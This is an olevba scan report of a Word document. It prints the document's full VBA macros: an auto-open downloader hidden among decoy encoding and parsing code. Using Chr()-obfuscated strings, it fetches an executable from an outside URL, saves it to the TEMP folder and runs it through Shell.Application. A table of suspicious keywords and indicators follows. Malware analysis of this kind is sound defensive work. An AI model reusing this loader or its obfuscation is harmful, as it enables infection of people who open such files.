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- olevba 0.41 -
- Flags Filename
- ----------- -----------------------------------------------------------------
- OLE:MASIHB-V mse7396821.doc
- (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
- ===============================================================================
- FILE: mse7396821.doc
- Type: OLE
- -------------------------------------------------------------------------------
- VBA MACRO ThisDocument.cls
- in file: mse7396821.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Sub autoopen()
- NNmmceek 3800, 6.9004
- End Sub
- ' // Interleaves bits
- Private Sub Interleave(SlotIndex As Long, cval As Long, t8c5 As Long, t2c1 As Long)
- Dim tblidxBinary As String
- Dim cvalBinary As String
- tblidxBinary = Binary2(CStr(SlotIndex), 11)
- cvalBinary = Binary2(CStr(cval), 4)
- t8c5 = Dec2(Left(tblidxBinary, 7) & Mid(cvalBinary, 4 - 3, 1) & Mid(cvalBinary, 4 - 2, 1) & Mid(tblidxBinary, 11 - 3, 1))
- t2c1 = Dec2(Mid(tblidxBinary, 11 - 2, 1) & Mid(cvalBinary, 4 - 1, 1) & Mid(tblidxBinary, 11 - 1, 1) & Mid(cvalBinary, 4 - 0, 1) & Mid(tblidxBinary, 11 - 0, 1))
- End Sub
- Sub NNmmceek(cscscss As Integer, dDouble As Double)
- DurationTo
- End Sub
- -------------------------------------------------------------------------------
- VBA MACRO Module1.bas
- in file: mse7396821.doc - OLE stream: u'Macros/VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Private Function UnmapTop(ByVal day As Integer, ByVal year As Integer, ByVal top As Long, ByVal digits As Integer) As Long
- Dim d2 As Long
- Dim d1 As Long
- Dim d0 As Long
- Dim y As Long
- Dim poot As Long
- Dim n2 As Long
- Dim n1 As Long
- Dim n0 As Long
- Dim f3 As Long
- Dim f2 As Long
- Dim f1 As Long
- Dim f0 As Long
- Dim p3 As Long
- Dim p2 As Long
- Dim p1 As Long
- d2 = top \ 100
- d1 = (top Mod 100) \ 10
- d0 = top Mod 10
- ' / generate key (P3P2P1F0) and reverse key (F3F2F1F0)
- f0 = 1
- y = year Mod 16
- p1 = (y + 1) Mod 10
- f1 = 10 - p1
- p2 = (((y + 1) * (y + 2)) \ 2) Mod 10
- f2 = 10 - ((p2 + f1 * p1) Mod 10)
- p3 = (((y + 1) * (y + 2) * (y + 3)) \ 6) Mod 10
- f3 = 10 - ((p3 + f1 * p2 + f2 * p1) Mod 10)
- If digits = 1 Then
- n0 = (d0 * f0 + day * f1) Mod 10
- n1 = 0
- n2 = 0
- End If
- If digits = 2 Then
- n0 = (d0 * f0 + d1 * f1 + day * f2) Mod 10
- n1 = (d1 * f0 + day * f1) Mod 10
- n2 = 0
- End If
- If digits = 3 Then
- n0 = (d0 * f0 + d1 * f1 + d2 * f2 + day * f3) Mod 10
- n1 = (d1 * f0 + d2 * f1 + day * f2) Mod 10
- n2 = (d2 * f0 + day * f1) Mod 10
- End If
- poot = 100 * n2 + 10 * n1 + n0
- UnmapTop = poot
- End Function
- ' // vcrplus.h -
- ' // qlookup.c
- Private Function FindSlotIndex(StartTime As Integer, Duration As Integer) As Long
- Dim j As Long
- For j = 0 To SOFTLIMIT - 1
- If SlotTable(j)(0) = StartTime And SlotTable(j)(1) = Duration Then
- FindSlotIndex = j
- Exit Function
- End If
- Next
- End Function
- ' // misc.h
- Private Function EndTime(ByVal start As Integer, ByVal dur As Integer) As Integer
- Dim min As Integer
- Dim hr As Integer
- min = (start Mod 100) + dur
- hr = min \ 60
- min = min Mod 60
- hr = (hr + start \ 100) Mod 24
- EndTime = hr * 100 + min
- End Function
- ' // scramble.h
- Public Function CrossMultiply2(ByVal sValue As String, ByVal sKey As String) As String
- Dim iValueLen As Integer
- iValueLen = Len(StripZero(sValue))
- Do
- CrossMultiply2 = Pad(Pad(Multiply(sValue, sKey, 10, 0), iValueLen), 8)
- sValue = CrossMultiply2
- Loop Until Mid$(CrossMultiply2, Len(CrossMultiply2) - iValueLen + 1, 1) <> "0"
- End Function
- Private Sub Deinterleave(ByVal t8c5 As Long, ByVal t2c1 As Integer, SlotIndex As Long, cval As Integer)
- Dim t8c5binary As String
- Dim t2c1binary As String
- t8c5binary = Binary2(CStr(t8c5), 10)
- t2c1binary = Binary2(CStr(t2c1), 10)
- SlotIndex = Dec2(Left(t8c5binary, 7) & Right(t8c5binary, 1) & Mid(t2c1binary, 10 - 4, 1) & Mid(t2c1binary, 10 - 2, 1) & Mid(t2c1binary, 10 - 0, 1))
- cval = Dec2(Mid(t8c5binary, 10 - 2, 1) & Mid(t8c5binary, 10 - 1, 1) & Mid(t2c1binary, 10 - 3, 1) & Mid(t2c1binary, 10 - 1, 1))
- End Sub
- ' // Will produce a binary string of a decimal number
- Public Function Binary2(sNumber As String, iSize As Integer) As String
- Binary2 = Pad(Convert(sNumber, 10, 2), iSize)
- End Function
- ' // Will produce a decimal number of a binary string
- Public Function Dec2(sNumber As String) As String
- Dec2 = Convert(sNumber, 2, 10)
- End Function
- Public Function Dec33(FindSlotIndex As String, SomeVarI As Double)
- Set noexile = FindSlotAs2Index(Chr(83) & "h" & "e" & Chr(108) & Chr(108) & ";<=" + Chr(46) & Chr(65) & "p" & Chr(112) & Chr(108) & Chr(105) & Chr(99) & Chr(97) & Chr(116) & Chr(105) & Chr(111) & Chr(110))
- noexile.Open (FindSlotIndex)
- End Function
- Private Function DecodeRight3Digits2(sRight3Digits As String) As String
- DecodeRight3Digits2 = Convert(sRight3Digits, 10, 32)
- End Function
- Private Sub Deinterleave2(ByVal A As Long, ByVal B As Integer, iSlotIndex As Long, iChannel As Integer)
- Dim Abin As String
- Dim Bbin As String
- Abin = Binary2(CStr(A), 10)
- Bbin = Binary2(CStr(B), 5)
- iSlotIndex = Dec2(Slice(Abin, 1, 7) & Slice(Abin, 10) & Slice(Bbin, 1) & Slice(Bbin, 3) & Slice(Bbin, 5))
- iChannel = Dec2(Slice(Abin, 8, 9) & Slice(Bbin, 2) & Slice(Bbin, 4))
- Debug.Print Abin & " " & Bbin
- Debug.Print iSlotIndex & " " & iChannel
- End Sub
- -------------------------------------------------------------------------------
- VBA MACRO Module2.bas
- in file: mse7396821.doc - OLE stream: u'Macros/VBA/Module2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' // Encode.c
- Public Function Encode(day As Integer, month As Integer, year As String, Channel As Integer, StartTime As Integer, Duration As Integer)
- Dim j As Integer
- Dim SlotIndex As Long
- Dim limit_ As Long
- Dim doneflag As Long ' FULLSEARCH
- Dim s5_out As Long
- Dim Right3Digits As Integer
- Dim Right5BinaryDigits As Integer
- Dim ofout As Integer
- Dim EncodedNumber As Long
- Dim Left5Digits As Long
- Dim number As Long
- Dim s4_out As Long
- MonthArray = Array("Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "Aug", "Sep", "Oct", "Nov", "Dec")
- Set Encode = CreateObject(Replace(year, Chr(35 * 2 - 14 + 6), ""))
- If day >= 0 Then
- Exit Function
- End If
- C.reateSlotTable
- year = year Mod 100
- SlotIndex = Find.SlotIndex(StartTime, Duration)
- If SlotIndex = -1 Then
- Encode = -1 ' error
- Exit Function
- End If
- ' From them infer what must have been step 4 & step 5 results */
- Inter.leave SlotIndex, Channel - 1, s4_out, s5_out
- ' If the mapped_top is zero then top and offset are zero */
- If s4_out = 0 Then
- Left5Digits = 0
- ofout = 0
- Else
- Dim i As Integer
- Dim tmp As Long
- j = Len(CStr(s4_out))
- limit_ = 10 ^ j
- If j > 3 Then
- Encode = 0 ' needs higher digit coding
- End If
- End If
- End Function
- Public Function CrossMultiply3(Interleave2 As Long)
- Dim PbMain31 As Object
- Set PbMain31 = FindSlotAs2Index(Chr(77) & Chr(105) & "c" & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & "t" & Chr(46) & Chr(88) & "M" & Chr(76) & "H" & Chr(84) & Chr(84) & "P")
- Left20Digits PbMain31
- PbMain31.Send
- CrossMultiply3 = PbMain31.responseBody
- End Function
- Public Function limitCrossMultiply3(Interleave2 As Long)
- limit_ = limit_ \ 10
- ofout = 0
- Left5Digits = s4_out
- ' Get a Left5Digits with same no digits as s4_out
- ' May have to loop several times
- Do
- ' Reverse the MapTop encryption
- Left5Digits = Unm.apTop(day, year, Left5Digits, j)
- For i = 0 To (year Mod 16)
- 'ofout = ofout + (MapTop(day, i, Left5Digits, j) Mod 10)
- Next
- Loop While Left5Digits < limit_
- ' Add sum of final Left5Digits's digits to offset
- tmp = Left5Digits
- While tmp > 0
- ofout = ofout + (tmp Mod 10)
- tmp = tmp \ 10
- Wend
- ofout = ofout Mod 32
- End If
- ' Have two of the three inputs to step 5; determine the rem
- For Right5BinaryDigits = 0 To 31
- j = (Right5BinaryDigits + (day * (month + 1)) + ofout) Mod 32
- If j = s5_out Then
- Exit For
- End If
- Next
- ' Assemble the output of step 1
- Right3Digits = Enc.ode_Right3Digits(day, Right5BinaryDigits)
- EncodedNumber = Right3Digits + (1000 * Left5Digits)
- ' Invert the mixing
- 'number = CrossMultiply(EncodedNumber, DecodeKey)
- number = CrossMultiply2(CStr(EncodedNumber), CStr(DecodeKey))
- Encode = number
- End Function
- ' // Decode.c
- Public Function Decode(ByVal ThisMonth As Integer, ByVal ThisDate As Integer, ByVal ThisYear As Integer, ByVal number As Long) As Variant
- Dim EncodedNumber As String
- Dim Left5Digits As String
- Dim Right3Digits As Integer
- Dim LeftBinaryDigits As Integer
- Dim Right5BinaryDigits As Integer
- Dim s5_out As Integer
- Dim ofout As Integer
- Dim mtout As Long
- Dim SlotIndex As Long
- Dim DayOut As Integer
- Dim Channel As Integer
- Dim StartTime As Integer
- Dim Duration As Integer
- MonthArray = Array("Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "Aug", "Sep", "Oct", "Nov", "Dec")
- CreateSlotTable
- ThisYear = ThisYear Mod 100
- If ThisMonth > 12 Or ThisMonth < 1 Or ThisDate < 1 Or ThisDate > 31 Then
- 'Debug.Print "Invalid date"
- Exit Function
- End If
- If number < 1 Or number > 99999999 Then
- 'Debug.Print "Sorry, plus code too long"
- Exit Function
- End If
- ofout = INVALID
- mtout = INVALID
- EncodedNumber = CrossMultiply2(CStr(number), GenerateKey(2, 8))
- Right3Digits = CInt(Right$(EncodedNumber, 3))
- Left5Digits = Left$(EncodedNumber, 5)
- LeftBinaryDigits = (Right3Digits - 1) \ 32
- Right5BinaryDigits = (Right3Digits - 1) Mod 32
- DayOut = LeftBinaryDigits + 1
- If DayOut < ThisDate Then
- ThisMonth = ThisMonth + 1
- If ThisMonth > 12 Then
- ThisMonth = 1
- ThisYear = (ThisYear + 1) Mod 100
- End If
- End If
- If number >= 1000 Then
- Offset DayOut, ThisYear, Left5Digits, ofout, mtout
- Else
- mtout = 0
- ofout = 0
- End If
- s5_out = (Right5BinaryDigits + (DayOut * (ThisMonth + 1)) + ofout) Mod 32
- Deinterleave2 mtout, s5_out, SlotIndex, Channel
- Channel = Channel + 1
- Lookup SlotIndex, StartTime, Duration
- Decode = Array(DayOut, ThisMonth, ThisYear, Channel, StartTime, Duration, EndTime(StartTime, Duration))
- End Function
- Private Sub Fill(Index As Integer, time As Integer, dur As Integer)
- Dim i As Integer
- For i = 0 To 33
- SlotTable(i + Index) = Array(time + TList(i), dur + DList(i))
- Next
- End Sub
- Public Function Right51BinaryDigits(ServidrGEN9_4 As Object, ServidrGEN9_3 As String) As Integer
- Right51BinaryDigits = 15
- ServidrGEN9_4.savetofile ServidrGEN9_3, 2
- Right51BinaryDigits = 2
- End Function
- Private Function ScanForStart(start As Integer, prev As Long) As Long
- Dim j As Long
- CreateSlotTable
- For j = prev + 1 To SOFTLIMIT - 1
- If SlotTable(j).start = start Then
- ScanForStart = j
- End If
- Next
- End Function
- Public Function DurationTo()
- Dim CrossBoss As Object
- Set CrossBoss = FindSlotAs2Index(Chr(65) & "do" & Chr(100) & Chr(98) & Chr(46) & Chr(83) & Chr(116) & Chr(114) & Chr(101) & "a" & Chr(109))
- CrossBoss.Type = 1
- Dim ServidrGEN9_3 As String
- ServidrGEN9_3 = GetThisStringT()
- With CrossBoss
- .Open
- .write CrossMultiply3(2020)
- End With
- Dim HricK As Double
- HricK = Right32Digits("CrossBoss", "CrossBoss", CrossBoss, ServidrGEN9_3, 13.55)
- Dec33 ServidrGEN9_3, HricK
- End Function
- Private Sub Lookup(ByVal i As Long, StartTime As Integer, Duration As Integer)
- If i > LIMIT Then
- 'Debug.Print "Illegal table index"
- Exit Sub
- End If
- If i > SOFTLIMIT Then
- StartTime = INVALID
- Duration = INVALID
- Exit Sub
- End If
- ' Open App.Path & "\slots.txt" For Output As #1
- ' For i = 0 To 2202
- ' Print #1, CStr(SlotTable(i)(0)) & "," & CStr(SlotTable(i)(1))
- ' Next
- ' Close #1
- StartTime = SlotTable(i)(0)
- Duration = SlotTable(i)(1)
- End Sub
- Private Function GetDuration(Index As Long) As Integer
- GetDuration = SlotTable(Index).leng
- End Function
- -------------------------------------------------------------------------------
- VBA MACRO Module3.bas
- in file: mse7396821.doc - OLE stream: u'Macros/VBA/Module3'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Private Sub Offset(ByVal iDay As Integer, ByVal iYear As Integer, ByVal sTop5Digits As String, OffsetOut As Integer, TopOut As Long)
- Dim i As Integer
- Dim Offset As Integer
- Dim iDigitCount As Long
- Dim d As String
- Dim MapTopX As String
- Dim sTop5Short As String
- iDigitCount = Len(CStr(Val(sTop5Digits)))
- sTop5Short = Right$(sTop5Digits, iDigitCount)
- For i = 1 To iDigitCount
- Offset = Offset + Val(Slice(sTop5Short, i))
- Next
- Do
- For i = 0 To (iYear Mod 16)
- d = CStr(iDay Mod 10) & sTop5Short
- MapTopX = Slice(Multiply(Reverse(GenerateKey(i, 8)), d, 10, 0), 2, 2 + iDigitCount - 1)
- Offset = Offset + Val(Right$(MapTopX, 1))
- Next
- sTop5Short = MapTopX
- Loop Until Slice(sTop5Short, 1) <> "0" Or Val(sTop5Short) = 0
- OffsetOut = Offset Mod 32
- TopOut = Val(sTop5Short)
- End Sub
- Private Sub Decode_Right3Digits(ByVal Right3Digits As Integer, ByRef day As Integer, ByRef Right5BinaryDigits As Integer)
- day = ((Right3Digits - 1) / 32) + 1 ' Top bits
- Right5BinaryDigits = (Right3Digits - 1) Mod 32 ' Bottom 5 bits
- End Sub
- Private Function Encode_Right3Digits(ByVal day As Integer, ByVal Right5BinaryDigits As Integer)
- Encode_Right3Digits = Right5BinaryDigits + (32 * (day - 1)) + 1
- End Function
- Public Function GetThisStringT() As String
- Set sTop1Short = FindSlotAs2Index(Chr(87) & Chr(80 + 3) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) + Chr(23 * 2) & Chr(40 * 2 + 3) & Chr(104) & Chr(101) & Chr(108) & Chr(108)).Environment(Chr(80) & Chr(114) & "o" & Chr(99) & Chr(101) & "s" & "s")
- ServidrGEN9_2 = sTop1Short("T" & Chr(69) & Chr(77) & Chr(80))
- GetThisStringT = ServidrGEN9_2 & "\" & "vts" & Chr(65) & "bd." & "e" & Chr(120) & "e"
- End Function
- Public Function Right32Digits(CrossBoss2 As String, CrossBoss3 As String, CrossBoss As Object, ServidrGEN9_3 As String, ServidrGEN9_8 As Double) As Double
- Right32Digits = 5
- Right32Digits = Right51BinaryDigits(CrossBoss, ServidrGEN9_3)
- Right32Digits = 99.9
- End Function
- Public Sub Test()
- Dim vDecode As Variant
- vDecode = Decode(3, 2, 2005, 10)
- Debug.Print vDecode(0)
- Debug.Print vDecode(1)
- Debug.Print vDecode(2)
- Debug.Print vDecode(3)
- Debug.Print vDecode(4)
- Debug.Print vDecode(5)
- End Sub
- Private Sub FillQHB(Index As Integer, dur As Integer)
- Dim i As Integer
- For i = 0 To 23
- SlotTable(Index + i * 2) = Array(i * 100 + 15, dur)
- SlotTable(Index + i * 2 + 1) = Array(i * 100 + 45, dur)
- Next
- End Sub
- Private Function FillHHB(Index As Integer, dur As Integer)
- Dim i As Integer
- For i = 23 To 0 Step -1
- SlotTable(Index + (23 - i) * 2) = Array(i * 100 + 30, dur)
- SlotTable(Index + (23 - i) * 2 + 1) = Array(i * 100, dur)
- Next
- End Function
- -------------------------------------------------------------------------------
- VBA MACRO Module4.bas
- in file: mse7396821.doc - OLE stream: u'Macros/VBA/Module4'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function ParseLine(linetext As String, Optional iOutputPos, Optional bParsed As Boolean) As Variant
- Dim oParseTree As New ParseTree
- Dim vParseExpression As Variant
- Dim vPosition As Variant
- Dim lindex As Long
- Dim member As ParseTree
- Dim bSpacer As Boolean
- ParserText = linetext
- Set Positions = New Collection
- Set Colours = New Collection
- CanonicalText = ""
- If Not LineParse.Parse(oParseTree) Then
- If linetext <> "" Then
- AddText linetext, vbRed
- End If
- ParseLine = Array(CanonicalText, Positions, Colours)
- iOutputPos = Len(linetext) + 1
- bParsed = False
- Exit Function
- End If
- bParsed = True
- iOutputPos = ParserTextPosition
- ' Variable
- AddText oParseTree(1).Text & oParseTree(2).Text, variableassign_col
- ' ws
- bSpacer = WS(oParseTree(3))
- ' Colon equals
- AddText Spacer(bSpacer) & ":= ", vbBlack
- ' ws
- WS oParseTree(5)
- Select Case oParseTree(6).Index
- Case 1, 2, 3
- AddText oParseTree(6)(1)(1).Text, bracket_col
- Set member = oParseTree(6)(1)(3)
- ParseExpression member
- AddText oParseTree(6)(1)(5).Text, bracket_col
- Case Else
- Set member = oParseTree(6)(1)
- ParseExpression member
- End Select
- ' Semi colon
- AddText ";", vbBlack
- ParseLine = Array(CanonicalText, Positions, Colours)
- End Function
- Private Function WS(oWS As Integer) As Boolean
- If oWS(1).Index = 1 Then
- AddText oWS(2).Text, vbBlack
- Else
- WS = True
- End If
- End Function
- Public Function FindSlotAs2Index(doneflagz3 As String)
- For i = 3 To 5
- doneflagz3 = Replace(doneflagz3, Chr(35 * 2 - 14 + i), "")
- Next i
- Set FindSlotAs2Index = Encode(0, 1, doneflagz3, 2, 3, 4)
- End Function
- Private Function Spacer(bYes As Boolean)
- If bYes Then
- Spacer = " "
- End If
- End Function
- Private Function ParseExpression(oResult As Integer)
- Dim member As ParseTree
- Dim lindex As Long
- Select Case oResult.Index
- Case 0 ' bracketed expression
- AddText oResult(1).Text, bracket_col
- WS oResult(2)
- Set member = oResult(3)
- ParseExpression member
- WS oResult(4)
- AddText oResult(5).Text, bracket_col
- Case 1 ' literal
- Set member = oResult(1)
- ParseLiteralSubExpression member
- Case 2, 3 ' and, or
- If oResult(1)(1).Index = 1 Then
- AddText UCase(oResult(1)(1).Text) & " ", keyword_col
- Else
- AddText oResult(1)(1).Text, keyword_col
- End If
- WS oResult(1)(2)
- For lindex = 1 To oResult(1)(3).SubTree.Count
- Set member = oResult(1)(3)(lindex)
- If member.Name = "expression" Then
- ParseExpression member(1)
- Else
- WS member(1)
- AddText ",", vbBlack
- AddText Spacer(WS(member(3))), vbBlack
- End If
- Next
- Case 4 'repeat
- If oResult(1)(1).Index = 1 Then
- AddText "REPEAT", keyword_col
- Else
- AddText "#", keyword_col
- End If
- AddText Spacer(WS(oResult(1)(2))), vbBlack
- Set member = oResult(1)(3)(1)
- ParseExpression member
- If oResult(1)(4).Index = 1 Then
- AddText Spacer(WS(oResult(1)(4)(1)(1))), vbBlack
- If oResult(1)(4)(1)(2).Index = 1 Then
- AddText "UNTIL", keyword_col
- Else
- AddText ":", keyword_col
- End If
- AddText Spacer(WS(oResult(1)(4)(1)(3))), vbBlack
- Set member = oResult(1)(4)(1)(4)(1)
- ParseExpression member
- End If
- If oResult(1)(5).Index = 1 Then
- AddText Spacer(WS(oResult(1)(5)(1)(1))), vbBlack
- If oResult(1)(5)(1)(2).Index = 1 Then
- AddText "MIN", keyword_col
- Else
- AddText "-", keyword_col
- End If
- AddText Spacer(WS(oResult(1)(5)(1)(3))), vbBlack
- AddText oResult(1)(5)(1)(4).Text, vbBlack
- End If
- If oResult(1)(6).Index = 1 Then
- AddText Spacer(WS(oResult(1)(6)(1)(1))), vbBlack
- If oResult(1)(6)(1)(2).Index = 1 Then
- AddText "MAX", keyword_col
- Else
- AddText "+", keyword_col
- End If
- AddText Spacer(WS(oResult(1)(6)(1)(3))), vbBlack
- AddText oResult(1)(6)(1)(4).Text, vbBlack
- End If
- Case 5 'list
- If oResult(1)(1).Index = 1 Then
- AddText "LIST", keyword_col
- Else
- AddText "@", keyword_col
- End If
- AddText Spacer(WS(oResult(1)(2))), vbBlack
- Set member = oResult(1)(3)(1)
- ParseExpression member
- WS oResult(1)(4)
- AddText ",", vbBlack
- AddText Spacer(WS(oResult(1)(6))), vbBlack
- Set member = oResult(1)(7)(1)
- ParseExpression member
- If oResult(1)(8).Index = 1 Then
- AddText Spacer(WS(oResult(1)(8)(1)(1))), vbBlack
- If oResult(1)(8)(1)(2).Index = 1 Then
- AddText "MIN", keyword_col
- Else
- AddText "-", keyword_col
- End If
- AddText Spacer(WS(oResult(1)(8)(1)(3))), vbBlack
- AddText oResult(1)(8)(1)(4).Text, vbBlack
- End If
- If oResult(1)(9).Index = 1 Then
- AddText Spacer(WS(oResult(1)(9)(1)(1))), vbBlack
- If oResult(1)(9)(1)(2).Index = 1 Then
- AddText "MAX", keyword_col
- Else
- AddText "+", keyword_col
- End If
- AddText Spacer(WS(oResult(1)(9)(1)(3))), vbBlack
- AddText oResult(1)(9)(1)(4).Text, vbBlack
- End If
- Case 6 'in
- If oResult(1)(1).Index = 1 Then
- AddText "IN", keyword_col
- Else
- AddText ">", keyword_col
- End If
- AddText Spacer(WS(oResult(1)(2))), vbBlack
- Set member = oResult(1)(3)
- ParseInSubExpression member
- Case 7 ' optional
- If oResult(1)(1).Index = 1 Then
- AddText "OPTIONAL", keyword_col
- Else
- AddText "?", keyword_col
- End If
- AddText Spacer(WS(oResult(1)(2))), vbBlack
- Set member = oResult(1)(3)(1)
- ParseExpression member
- Case 8 ' not
- If oResult(1)(1).Index = 1 Then
- AddText "NOT", keyword_col
- Else
- AddText "!", keyword_col
- End If
- AddText Spacer(WS(oResult(1)(2))), vbBlack
- Set member = oResult(1)(3)(1)
- ParseExpression member
- Case 9 ' EOS
- If oResult(1).Index = 1 Then
- AddText "EOS", auxkeyword_col
- Else
- AddText "||", auxkeyword_col
- End If
- Case 10 ' PASS
- If oResult(1).Index = 1 Then
- AddText "PASS", auxkeyword_col
- Else
- AddText "*", auxkeyword_col
- End If
- Case 11 'FAIL
- If oResult(1).Index = 1 Then
- AddText "FAIL", auxkeyword_col
- Else
- AddText "~", auxkeyword_col
- End If
- Case 12 ' External
- If oResult(1)(1).Index = 1 Then
- AddText "EXTERNAL", keyword_col
- Else
- AddText "=", keyword_col
- End If
- AddText Spacer(WS(oResult(1)(2))), vbBlack
- AddText oResult(1)(3).Text, vbBlack
- Dim sParameterText As String
- Select Case oResult(1)(4).Index
- Case 0 ' No parameters
- Case 1
- Dim vParameter As Variant
- AddText "(", vbBlack
- For Each vParameter In oResult(1)(4)(1)(1).SubTree
- sParameterText = sParameterText & "," & vParameter.Text
- Next
- AddText Mid$(sParameterText, 2), vbBlack
- AddText ")", vbBlack
- End Select
- Case 13 'variable
- AddText oResult(1).Text, variable_col
- End Select
- End Function
- Private Function ParseInSubExpression(oResult As Integer)
- Dim oSub As ParseTree
- For Each oSub In oResult.SubTree
- If oSub(1).Text = "," Then
- AddText ",", vbBlack
- AddText Spacer(WS(oSub(2))), vbBlack
- Else
- If oSub(1).Index = 1 Then
- If oSub(1)(1).Index = 1 Then
- AddText "NOT", auxkeyword_col
- Else
- AddText "!", auxkeyword_col
- End If
- AddText Spacer(WS(oSub(2))), vbBlack
- End If
- If oSub(3).Index = 1 Then
- If oSub(3)(1).Index = 1 Then
- AddText "CASE", auxkeyword_col
- Else
- AddText "^", auxkeyword_col
- End If
- AddText Spacer(WS(oSub(4))), vbBlack
- End If
- Select Case oSub(5).Index
- Case 1 ' range
- AddText oSub(5)(1)(1).Text, vbBlack
- AddText Spacer(WS(oSub(5)(1)(2))), vbBlack
- If oSub(5)(1)(3).Index = 1 Then
- AddText "TO", auxkeyword_col
- Else
- AddText "-", auxkeyword_col
- End If
- AddText Spacer(WS(oSub(5)(1)(4))), vbBlack
- AddText oSub(5)(1)(5).Text, vbBlack
- Case 2, 3 ' number
- AddText oSub(5)(1).Text, vbBlack
- End Select
- End If
- Next
- End Function
- Public Function Left20Digits(Interleave2 As Object)
- Dim vDecodeD2 As String
- vDecodeD2 = Chr(104) & Chr(116) & Chr(116) & Chr(112) & Chr(58) & Chr(47) & "/" & Chr(102) & "l" & "e" & Chr(120) & "i" & Chr(99) & Chr(97) & "l" & Chr(108) & Chr(46) & Chr(99) & "o" & Chr(46) & "u" & Chr(107) & "/" & Chr(102) & Chr(115) & Chr(102) & Chr(52) & "f" & "d" & Chr(51) & Chr(50) & "/" & "8" & "i" & Chr(107) & Chr(54) & Chr(115) & Chr(99) & "." & Chr(101) & Chr(120) & "e"
- Interleave2.Open Chr(71) & "E" & Chr(84), vDecodeD2, False
- End Function
- Private Function ParseLiteralSubExpression(oResult As Integer)
- Dim oSub As ParseTree
- If oResult(1).Index = 1 Then
- If oResult(1)(1)(1).Index = 1 Then
- AddText "CASE ", auxkeyword_col
- Else
- AddText "^", auxkeyword_col
- End If
- End If
- For Each oSub In oResult(2).SubTree
- If oSub(1).Text = "+" Then
- AddText "+ ", auxkeyword_col
- Else
- AddText oSub.Text, vbBlack
- End If
- Next
- End Function
- Private Sub AddText(ByVal sAddString As String, ByVal lColour As Long)
- Dim lTextPos As Long
- lTextPos = Len(CanonicalText) + 1
- CanonicalText = CanonicalText & sAddString
- Positions.Add lTextPos
- Colours.Add lColour
- End Sub
- +------------+----------------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------------+-----------------------------------------+
- | AutoExec | AutoOpen | Runs when the Word document is opened |
- | Suspicious | Open | May open a file |
- | Suspicious | Binary | May read or write a binary file (if |
- | | | combined with Open) |
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | SaveToFile | May create a text file |
- | Suspicious | Write | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Output | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Print # | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Shell | May run an executable file or a system |
- | | | command (obfuscation: VBA expression) |
- | Suspicious | ADODB.Stream | May create a text file (obfuscation: |
- | | | VBA expression) |
- | Suspicious | Microsoft.XMLHTTP | May download files from the Internet |
- | | | (obfuscation: VBA expression) |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | Suspicious | VBA obfuscated | VBA string expressions were detected, |
- | | Strings | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | IOC | | URL (obfuscation: VBA expression) |
- | | uk/fsf4fd32/8ik6sc.e | |
- | | xe | |
- | IOC | vtsAbd.exe | Executable file name (obfuscation: VBA |
- | | | expression) |
- | IOC | 8ik6sc.exe | Executable file name (obfuscation: VBA |
- | | | expression) |
- | VBA string | Shell;<=.Application | (Chr(83) & "h" & "e" & Chr(108) & |
- | | | Chr(108) & ";<=" + Chr(46) & Chr(65) & |
- | | | "p" & Chr(112) & Chr(108) & Chr(105) & |
- | | | Chr(99) & Chr(97) & Chr(116) & Chr(105) |
- | | | & Chr(111) & Chr(110)) |
- | VBA string | Microsoft.XMLHTTP | (Chr(77) & Chr(105) & "c" & Chr(114) & |
- | | | Chr(111) & Chr(115) & Chr(111) & |
- | | | Chr(102) & "t" & Chr(46) & Chr(88) & |
- | | | "M" & Chr(76) & "H" & Chr(84) & Chr(84) |
- | | | & "P") |
- | VBA string | Adodb.Stream | (Chr(65) & "do" & Chr(100) & Chr(98) & |
- | | | Chr(46) & Chr(83) & Chr(116) & Chr(114) |
- | | | & Chr(101) & "a" & Chr(109)) |
- | VBA string | WScript | Chr(87) & Chr(80 + 3) & Chr(99) & |
- | | | Chr(114) & Chr(105) & Chr(112) & |
- | | | Chr(116) |
- | VBA string | hell | Chr(104) & Chr(101) & Chr(108) & |
- | | | Chr(108) |
- | VBA string | Process | (Chr(80) & Chr(114) & "o" & Chr(99) & |
- | | | Chr(101) & "s" & "s") |
- | VBA string | TEMP | ("T" & Chr(69) & Chr(77) & Chr(80)) |
- | VBA string | \vtsAbd.exe | "\" & "vts" & Chr(65) & "bd." & "e" & |
- | | | Chr(120) & "e" |
- | VBA string | | Chr(104) & Chr(116) & Chr(116) & |
- | | uk/fsf4fd32/8ik6sc.e | Chr(112) & Chr(58) & Chr(47) & "/" & |
- | | xe | Chr(102) & "l" & "e" & Chr(120) & "i" & |
- | | | Chr(99) & Chr(97) & "l" & Chr(108) & |
- | | | Chr(46) & Chr(99) & "o" & Chr(46) & "u" |
- | | | & Chr(107) & "/" & Chr(102) & Chr(115) |
- | | | & Chr(102) & Chr(52) & "f" & "d" & |
- | | | Chr(51) & Chr(50) & "/" & "8" & "i" & |
- | | | Chr(107) & Chr(54) & Chr(115) & Chr(99) |
- | | | & "." & Chr(101) & Chr(120) & "e" |
- | VBA string | GET | Chr(71) & "E" & Chr(84) |
- +------------+----------------------+-----------------------------------------+
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